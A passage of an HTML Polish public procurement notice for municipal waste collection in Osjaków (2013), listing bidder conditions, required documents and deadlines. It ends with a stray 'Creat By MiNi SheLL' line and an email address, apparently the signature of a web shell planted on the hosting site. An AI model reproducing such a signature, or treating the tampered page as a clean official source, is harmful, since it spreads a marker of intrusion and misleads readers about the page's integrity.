- pojazdy, o których mowa wyżej są trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli  nieruchomości,
b) Wykonawca posiada bazę magazynowo-transportową:
- usytuowaną w gminie, z której terenu odbiera odpady komunalne, lub w odległości nie większej niż 60 km od granicy tej gminy,
- usytuowaną na terenie, do którego posiada tytuł prawny, zabezpieczoną w sposób uniemożliwiający wstęp osobom nieupoważnionym,
- wyposażoną w miejsca przeznaczone do parkowania pojazdów, które zabezpieczone są przed emisją zanieczyszczeń do gruntu 
- wyposażoną w pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
- wyposażoną w miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,
- wyposażoną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy następuje magazynowanie odpadów,
- oraz punkt bieżącej konserwacji i napraw pojazdów, miejsce do dezynfekcji pojazdów i ich mycia, jeśli czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej,
zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r., poz. 122).
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 400 000,00 zł. Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dowód wniesienia wadium, pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, przy wystąpieniu co najmniej jednej z okoliczności wymienionych poniżej:
1)	zmiany wynagrodzenia spowodowanej zmianą obowiązującej stawki podatku od towarów i usług,
2)	zmiany przepisów prawa, w tym również aktów prawa miejscowego, mających wpływ na sposób realizacji przedmiotu umowy (usługi),
3)	zmiany terminu wyposażenia nieruchomości w pojemniki do gromadzenia odpadów, o których mowa w § 2 umowy, z uwagi na termin podpisania umowy, z zastrzeżeniem, że pojemniki muszą być dostarczone najpóźniej do dnia 30 czerwca 2013r.,
4)	zmiany sposobu realizacji świadczenia, w uzgodnieniu z Zamawiającym, jeśli zmiany te będą korzystne dla Zamawiającego,
5)	odstąpienie na wniosek zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których zamawiający nie mógł przewidzieć na etapie przygotowywania postępowania o udzielenie zamówienia, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych przez Zamawiającego.
W związku ze wskazanymi w ust. 1 okolicznościami dopuszczalne jest zmniejszenie lub zwiększenie wynagrodzenia, przy czym zwiększenie wynagrodzenia dopuszczalne jest o kwotę nie większą niż udokumentowany wzrost kosztów świadczenia usługi (wzrost stawki podatku VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osjakow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Osjakowie, 98 - 320 Osjaków, ul. Targowa 26, pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 10:00, miejsce: Urząd Gminy w Osjakowie, 98 - 320 Osjaków, ul. Targowa 26, pokój nr 6 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com